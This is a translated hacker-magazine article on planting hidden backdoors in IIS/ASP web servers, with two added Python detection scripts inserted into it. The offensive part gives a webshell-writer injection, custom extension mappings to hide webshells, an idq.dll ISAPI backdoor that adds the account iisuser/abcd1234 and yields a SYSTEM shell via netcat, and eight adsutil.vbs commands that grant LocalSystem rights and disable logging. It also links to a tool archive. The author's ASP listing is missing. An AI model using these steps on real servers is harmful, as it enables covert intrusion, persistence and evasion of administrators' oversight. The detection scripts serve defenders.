Author: LCX Source: hacker X file
Even if you have changed the variable names in the original code and got past the anti-virus software, a careful administrator will still notice that an extra ASP file has appeared in the web directory of his site. To get around this I tried two approaches: ASP injection (the word "injection" really is fashionable) and using asp.dll in the IIS manager to parse an arbitrary suffix. Neither is technically deep, but both are good ideas, and if you think further along the same line you can configure a wonderful IIS backdoor. The details are as follows:
ASP backdoor placement method 1: ASP injection. First look at Figure 1:
This is the login page of a Dynamic Network article management system running on my local machine. It looks like any other such page, and all of its original functions still work. Now look at Figure 2:
Compare the two:
The URL in Figure 1 is http://192.168.1.3/asp/WZ/admin.asp.
The URL in Figure 2 is http://192.168.1.3/asp/WZ/admin.asp?id=1: the only difference is the extra parameter "?id=1". In Figure 2 you can type a file name into the upper input box, paste whatever code you like into the text box below, and click the Generate button to write a webshell, or any other text file (CGI, ASP, PHP, ASPX and so on), onto the server. How is this done? Just modify the code as its comments indicate and insert it at the bottom of an existing ASP page.
Program code:
Value = >
Note that this code requires the server to support FSO (Scripting.FileSystemObject), and it does not work in every ASP file: in some pages, depending on the code they already contain, the inserted block will not take effect, though it does not affect the use of the original file either. If you can write ASP yourself, you can also write your backdoor directly into the existing ASP files on the compromised host.
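As an added illustration (my own code, not the author's listing, which did not survive in this copy), here is a Python scan for the trace method 1 leaves in an ASP page: FSO instantiated, and a file operation whose file name or contents come straight from the request, typically in a second <% %> block appended after </html>. The sample page is constructed to match the description above; the trigger parameter ?id=1, the field names fname and code, and the variable names are assumptions.

```python
"""Scan ASP source for the injected FSO file-writer described in method 1.

Added example for this page, not the author's code. The sample page below is
constructed to match the description: a trigger parameter (?id=1), a file name
and a body taken from the request, and Scripting.FileSystemObject writing them
to disk. The trigger, field names and variable names are assumptions.
Detection is a same-line heuristic: an FSO file operation whose arguments
come from Request().
"""
import re

# Constructed sample: a stock login page with a writer block appended after </html>.
SAMPLE_ASP = r"""<%@ LANGUAGE="VBSCRIPT" %>
<html><body>
<form method="post" action="admin.asp"><input name="username"></form>
<%
' original login handling (constructed stand-in for the real page)
If Request.Form("username") <> "" Then
    Response.Write "checking..."
End If
%>
</body></html>
<%
' appended block: runs only when ?id=1 is supplied (assumed trigger)
If Request.QueryString("id") = "1" Then
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    Set f = fso.CreateTextFile(Server.MapPath(Request.Form("fname")), True)
    f.Write Request.Form("code")
    f.Close
End If
%>
"""

# Constructed sample: legitimate FSO use (hit counter) with a fixed path, no request data.
CLEAN_ASP = r"""<%
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath("counter.txt"), 1)
hits = f.ReadLine
f.Close
Response.Write "Visitors: " & hits & " for " & Request.ServerVariables("REMOTE_ADDR")
%>
"""

FSO_CREATE = re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"\s*\)', re.I)
# File-writing members of FSO/TextStream; Response.Write is excluded by the lookbehind.
FILE_OP = re.compile(r'(?<!Response)\.(CreateTextFile|OpenTextFile|OpenAsTextStream|'
                     r'CopyFile|MoveFile|Write|WriteLine)\b', re.I)
REQUEST_USE = re.compile(r'\bRequest\s*(\.\s*(Form|QueryString|Cookies|ServerVariables))?\s*\(', re.I)
TRAILING_BLOCK = re.compile(r'</html>\s*<%', re.I)


def scan_asp(source):
    """Return line numbers of FSO instantiation and of file operations fed by Request."""
    findings = {
        "fso_lines": [],
        "tainted_file_ops": [],
        "code_after_html": bool(TRAILING_BLOCK.search(source)),
    }
    for n, line in enumerate(source.splitlines(), 1):
        if FSO_CREATE.search(line):
            findings["fso_lines"].append(n)
        if FILE_OP.search(line) and REQUEST_USE.search(line):
            findings["tainted_file_ops"].append(n)
    return findings


def is_injected(findings):
    """Flag a file only when FSO is created AND a file op consumes request data."""
    return bool(findings["fso_lines"] and findings["tainted_file_ops"])


if __name__ == "__main__":
    for name, src in (("admin.asp (tampered)", SAMPLE_ASP), ("counter.asp (clean)", CLEAN_ASP)):
        f = scan_asp(src)
        print(name, "->", "SUSPICIOUS" if is_injected(f) else "ok", f)
```

The same-line taint check is deliberately simple: an attacker who copies Request.Form values into variables on separate lines slips past it, so treat hits as leads and review every FSO use in any page that has a second <% %> block after </html>. The clean counter page shows why FSO alone is not a verdict: it is flagged only when request data reaches a file operation.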
ASP backdoor placement method 2: use asp.dll in the IIS manager to parse an arbitrary suffix. Choose Control Panel > Administrative Tools > Internet Services Manager > web site > right-click > Properties > Home Directory > Configuration > Add. I added an application mapping for the extension .LCX, handled by asp.dll under winnt\system32\inetsrv. Figure 3:
Once this is done, rename the usual cmd.asp to cmd.LCX and run it. What happens? Figure 4:
It is still a webshell, and a made-up suffix is certainly more concealed. How cleverly you use it is up to you.
A deeper look at the ASP backdoor placement methods. Above I used asp.dll to parse files with the .LCX suffix. What if we use a purpose-built DLL to parse .LCX instead? If you can program, you can write such a DLL to do whatever you need. Can't? Ha, Yuan Ge of Lumeng (NSFocus) has already written one for us: idq.dll. Yes, the idq.dll you are thinking of, the one you drop into the scripts directory through the Unicode vulnerability and then connect to with ISPC. Now I have used this idq.dll as the ISAPI DLL for the extension mapping of method 2. What happens? You can do two things with it. Request http://targetip/anything.LCX and an account iisuser with the password abcd1234 is added to the host. Figure 5:
You can name XXX.LCX anything you like; the file does not need to exist on the host. If that is not enough, use NC to connect to the host and type the following:
nc targetip 80
POST /%08/anything.LCX
and there you are, logged in. On Win2000 + SP3 this is a SYSTEM shell. Figure 6:
I will not go into the principle here; see the IIS configuration-file backdoor written by tombkeeper PGN on aligreennet. Czy also wrote a DLL of the same kind, used from IE as http://ip/*.<whatever suffix you set>?shell=<the command you want to run>. Here is the backdoor I used on a zombie; I mapped the suffix .pH4. Figure 7:
You may say this IIS backdoor is easy to set up through a 3389 terminal session, but what about from the command line? There is a solution for that too. By default IIS installs 19 VBS scripts under \inetpub\adminscripts, and one of them, adsutil.vbs, can be used to install this wonderful IIS backdoor.
The method is as follows. Eight steps to the joy of the command line:
1. copy idq.dll %SystemRoot%\system32\iisapi.dll
Copy idq.dll into the system32 directory of the system drive and rename it iisapi.dll.
2. Find the site to work on.
cscript adsutil.vbs ENUM /P /w3svc
[/w3svc/info]
[/w3svc/filters]
[/w3svc/2]  <----- these are the virtual sites
[/w3svc/3]
[/w3svc/4]
[/w3svc/1]
3. List the DLLs that IIS already trusts to run in-process.
cscript adsutil.vbs GET /w3svc/InProcessIsapiApps
You will find the following DLLs:
"C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll"
4. Put all of those privileged IIS DLLs, plus the iisapi.dll copied in step 1, into the InProcessIsapiApps list. In-process ISAPI DLLs run inside inetinfo.exe, so our backdoor DLL gets LocalSystem privileges. Include every DLL found in step 3: SET replaces the whole list, so any DLL you leave out loses its in-process privilege.
cscript adsutil.vbs SET /w3svc/InProcessIsapiApps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\system32\iisapi.dll"
5. Set the mapping (all of the following is one command line; each entry is extension,DLL,flags,verbs).
cscript adsutil.vbs SET /w3svc/ScriptMaps
".asp,C:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".cer,C:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".asa,C:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".idc,C:\winnt\system32\inetsrv\httpodbc.dll,1,OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE"
".shtm,C:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST"
".shtml,C:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST"
".stm,C:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST"
".LCX,C:\winnt\system32\iisapi.dll,3,GET,HEAD,POST"
This writes the default mappings the IIS manager ships with, plus a .LCX mapping parsed by the iisapi.dll we copied; note the last line, which is the added .LCX mapping. You can add mappings for other extensions in the same way.
6. Add a virtual directory and set its properties.
cscript adsutil.vbs CREATE /w3svc/2/root (the directory name is Root)
cscript adsutil.vbs SET /w3svc/2/root/KeyType "IIsWebVirtualDir"
cscript adsutil.vbs SET /w3svc/2/root/AppRoot "/LM/w3svc/2/root"
cscript adsutil.vbs SET /w3svc/2/root/AppFriendlyName "root"
cscript adsutil.vbs SET /w3svc/2/root/AppIsolated 2
cscript adsutil.vbs SET /w3svc/2/root/AccessRead true
cscript adsutil.vbs SET /w3svc/2/root/AccessExecute true
cscript adsutil.vbs SET /w3svc/2/root/AccessScript true
(AppIsolated 2 is the pooled out-of-process setting; the in-process list from step 4 only applies to applications with AppIsolated 0, so if you want the DLL to run inside inetinfo.exe as LocalSystem, use 0 here.)
7. Add the .LCX mapping on the virtual directory Root as well, parsed by iisapi.dll.
cscript adsutil.vbs SET /w3svc/2/root/ScriptMaps ".LCX,C:\winnt\system32\iisapi.dll,1"
8. Record no logs.
cscript adsutil.vbs SET /w3svc/2/root/DontLog true
It must be said that although I have studied the adsutil.vbs commands for a long time, when I used the commands above to test three bots and my own machine, only two succeeded. My conclusion is that it only succeeds when the IIS configuration has not been modified from the defaults. Why is that? I hope the readers of this magazine who know this script and IIS ISAPI will study it. In the IIS graphical manager, however, this backdoor succeeds one hundred percent of the time.
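As an added example (my own code, not the author's or anything from the download archive), the following Python audits the three settings that methods 2 and 3 and the eight steps above change: ScriptMaps, InProcessIsapiApps and DontLog. It reads text in the shape of the adsutil.vbs listings on this page (one quoted "extension,DLL,flags,verbs" entry per line; header lines are ignored). The sample outputs are constructed, and the baseline sets (the page's default list plus the other stock IIS 5 extensions and DLLs) are assumptions to tune for the build you are auditing.

```python
"""Audit IIS 5 metabase settings printed by adsutil.vbs for the backdoor
shape described in methods 2 and 3 and the eight-step procedure above:
a made-up extension mapped to an ISAPI DLL, a foreign DLL added to
InProcessIsapiApps, and DontLog switched on.

Added example for this page, not the author's code. It parses text in the
shape of the listings on this page (one quoted "ext,dll,flags,verbs" entry
per line, header lines ignored); the sample outputs below are constructed
and the baseline sets are assumptions: the page's default list plus the
other stock IIS 5 mappings.
"""
import re

# Stock IIS 5 script-map extensions (assumed baseline).
BASELINE_EXTS = {".asp", ".asa", ".cer", ".cdx", ".idc", ".shtm", ".shtml",
                 ".stm", ".htr", ".ida", ".idq", ".htw", ".printer"}
# ISAPI DLLs those stock mappings point at (assumed baseline).
BASELINE_DLLS = {"asp.dll", "httpodbc.dll", "ssinc.dll", "ism.dll",
                 "idq.dll", "webhits.dll", "msw3prt.dll"}
# Default InProcessIsapiApps members, as listed in step 3 above.
BASELINE_INPROC = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed output of: cscript adsutil.vbs GET /w3svc/2/root/ScriptMaps
SCRIPTMAPS_OUT = r'''ScriptMaps : (LIST)
".asp,C:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".cer,C:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".asa,C:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".idc,C:\winnt\system32\inetsrv\httpodbc.dll,1,OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE"
".shtm,C:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST"
".shtml,C:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST"
".stm,C:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST"
".pH4,C:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST"
".LCX,C:\winnt\system32\iisapi.dll,3"
'''
# Constructed output of: cscript adsutil.vbs GET /w3svc/InProcessIsapiApps
INPROC_OUT = r'''InProcessIsapiApps : (LIST)
"C:\winnt\system32\idq.dll"
"C:\winnt\system32\inetsrv\httpext.dll"
"C:\winnt\system32\inetsrv\httpodbc.dll"
"C:\winnt\system32\inetsrv\ssinc.dll"
"C:\winnt\system32\msw3prt.dll"
"C:\winnt\system32\iisapi.dll"
'''
# Constructed output of: cscript adsutil.vbs GET /w3svc/2/root/DontLog
DONTLOG_OUT = "DontLog : (BOOLEAN) True"

QUOTED = re.compile(r'"([^"]*)"')


def _dll_name(path):
    """File name of a Windows path, lower-cased, regardless of slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_scriptmaps(text):
    """Return [(ext, dll_path, flags, [verbs])] from the quoted entries."""
    maps = []
    for line in text.splitlines():
        m = QUOTED.search(line)
        if not m:
            continue
        parts = [p.strip() for p in m.group(1).split(",")]
        if len(parts) < 3:
            continue
        flags = int(parts[2]) if parts[2].isdigit() else -1
        maps.append((parts[0].lower(), parts[1], flags, [v.upper() for v in parts[3:]]))
    return maps


def audit_scriptmaps(maps):
    """Flag mappings that depart from the stock set, as (ext, reason) pairs."""
    findings = []
    for ext, dll, _flags, verbs in maps:
        name = _dll_name(dll)
        if ext not in BASELINE_EXTS:
            findings.append((ext, "non-default extension mapped to %s" % name))
        if name not in BASELINE_DLLS:
            # A renamed copy of a stock DLL (step 1) looks like this; hash it on the host.
            findings.append((ext, "unknown ISAPI DLL %s" % dll))
        if not verbs:
            findings.append((ext, "no verb restriction, every method reaches the DLL"))
    return findings


def audit_inproc(text):
    """Return DLLs granted in-process (LocalSystem) execution beyond the stock list."""
    return [m.group(1) for m in QUOTED.finditer(text)
            if _dll_name(m.group(1)) not in BASELINE_INPROC]


def audit_dontlog(text):
    """True when DontLog is set, i.e. requests under that path leave no log line."""
    m = re.search(r"DontLog\s*:.*?\b(True|False)\b", text, re.I)
    return bool(m and m.group(1).lower() == "true")


if __name__ == "__main__":
    for ext, why in audit_scriptmaps(parse_scriptmaps(SCRIPTMAPS_OUT)):
        print("scriptmap", ext, ":", why)
    for dll in audit_inproc(INPROC_OUT):
        print("inprocess :", dll)
    print("dontlog   :", audit_dontlog(DONTLOG_OUT))
```

On the constructed input the .pH4 mapping (method 2) is caught only by its extension, since it points at the genuine asp.dll, while the .LCX mapping (method 3) is caught three times: unknown extension, unknown DLL name, and no verb restriction. A renamed idq.dll is only ever an "unknown DLL" to this script, so on the host compare its hash with the stock DLL and its creation time with the other ISAPI DLLs, and check the ScriptMaps and DontLog properties on both the site and the Root virtual directory, since the steps above set them in both places.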
It is fair to say that the backdoors configured with these three methods are currently the best backdoors available. But what do you want to do with bots? :-) Look at the screenshot I took on my own machine and you will understand that the best bot is our own computer. For your convenience I have packaged idq.dll, czy.dll and adsutil.vbs on my website;
the download URL is http://www.haiyang.net/safety/htm/iisback.rar.